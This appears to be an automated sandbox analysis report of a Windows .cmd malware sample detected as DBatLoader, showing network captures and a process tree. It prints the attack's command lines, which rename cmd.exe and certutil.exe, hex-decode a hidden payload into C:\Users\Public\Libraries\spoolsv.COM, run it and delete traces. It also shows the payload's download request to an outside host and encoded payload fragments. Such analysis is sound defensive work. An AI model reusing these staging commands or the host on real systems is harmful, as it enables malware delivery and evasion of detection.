6e 6d 50 53 48 52 6b 6e 46 Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
2024-12-19 11:39:30 UTC	9335	IN	Data Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30 Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	176.123.5.143	443	7828	C:\Users\Public\Libraries\spoolsv.COM

Timestamp	Bytes transferred	Direction	Data
2024-12-19 11:39:32 UTC	164	OUT	GET /233_Svcrhpjadgy HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: swamfoxinnc.com
2024-12-19 11:39:33 UTC	191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 19 Dec 2024 11:39:33 GMT Content-Type: text/html Content-Length: 58296 Connection: close Vary: Accept-Encoding ETag: "674db0b4-e3b8"
2024-12-19 11:39:33 UTC	16193	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
2024-12-19 11:39:33 UTC	16384	IN	Data Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54 Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
2024-12-19 11:39:34 UTC	16384	IN	Data Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46 Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
2024-12-19 11:39:34 UTC	9335	IN	Data Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30 Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0

Target ID:	0
Start time:	06:39:11
Start date:	19/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "
Imagebase:	0x7ff765640000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	1
Start time:	06:39:12
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	06:39:12
Start date:	19/12/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Imagebase:	0x7ff6613f0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	3
Start time:	06:39:12
Start date:	19/12/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:	0x7ff6bf3d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	06:39:12
Start date:	19/12/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:	0x7ff6613f0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	5
Start time:	06:39:12
Start date:	19/12/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "C:\\Users\\Public\\spoolsv.MPEG" 9
Imagebase:	0x7ff6bf3d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	06:39:13
Start date:	19/12/2024
Path:	C:\Users\Public\kn.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "C:\\Users\\Public\\spoolsv.MPEG" 9
Imagebase:	0x7ff7f7060000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Target ID:	7
Start time:	06:39:13
Start date:	19/12/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Imagebase:	0x7ff6bf3d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	06:39:13
Start date:	19/12/2024
Path:	C:\Users\Public\kn.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Imagebase:	0x7ff7f7060000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	9
Start time:	06:39:14
Start date:	19/12/2024
Path:	C:\Users\Public\Libraries\spoolsv.COM
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\spoolsv.COM
Imagebase:	0x400000
File size:	1'019'392 bytes
MD5 hash:	DFD15A4158AB979660435D6F3E95A3EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000003.1735073936.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000002.2463920192.00000000021B6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000002.2480657895.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 55%, ReversingLabs
Has exited:	true

Target ID:	10
Start time:	06:39:15
Start date:	19/12/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Imagebase:	0x7ff6bf3d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	11
Start time:	06:39:15
Start date:	19/12/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
Imagebase:	0x7ff6bf3d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	17
Start time:	06:40:04
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 2156
Imagebase:	0x1d0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true